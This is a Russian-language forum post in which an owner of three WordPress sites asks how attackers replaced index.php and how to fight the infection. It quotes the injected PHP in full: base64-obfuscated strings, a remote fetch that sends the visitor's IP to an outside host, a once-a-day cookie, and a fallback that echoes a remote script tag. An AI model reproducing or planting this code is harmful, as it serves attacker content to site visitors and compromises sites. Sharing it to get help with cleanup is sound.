Как можно проникнуть в файлы и подменить их

У меня на хостинге три сайта, вчера кто-то зашёл с помощью средств wordpres и обновил index.php в корне трёх сайтов. Один из них на wordpres 3.6 а два 3.5.2
syntax error, unexpected $end in index.php on line 39 wordpres

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
function sql2_safe($in) {
        $rtn = base64_decode($in);
        return $rtn;
}
function collectnewss() {

		if (!isset($_COOKIE["iJijkdaMnerys"])) {
        $value = 'yadeor';
		$ip = $_SERVER['REMOTE_ADDR'];
        $get = sql2_safe("aHR0cDovL3h4eHBvcm5vLnh4dXouY29tOjg4OC9tb3ZlLnBocD9pcD0=").$ip;
		$file = @fopen ($get, "r");
		$content = @fread($file, 1000);
		@setcookie("iJijkdaMnerys", $value, time()+3600*24);
		if (!$content)
			echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9hY2NvdW50dXMuZ2V0cy1pdC5uZXQvZ29vZ2xlc3RhdC5waHAiPjwvc2NyaXB0Pg==);
		else
			echo $content;

		}
}
collectnewss ();

Через хостинг не входили, я проверил логи. Через FTP тоже не входили. Один сайт с 3.6 я повторно обновил и всё нормально, сравнил с другими увидел это изменение, файлы сохранил. Думаю обновить сайты 3.5.2 или еще сидеть искать как проникли, мне с ними не горит.

Может кто чего подскажет, как с этими «вирусами» бороться.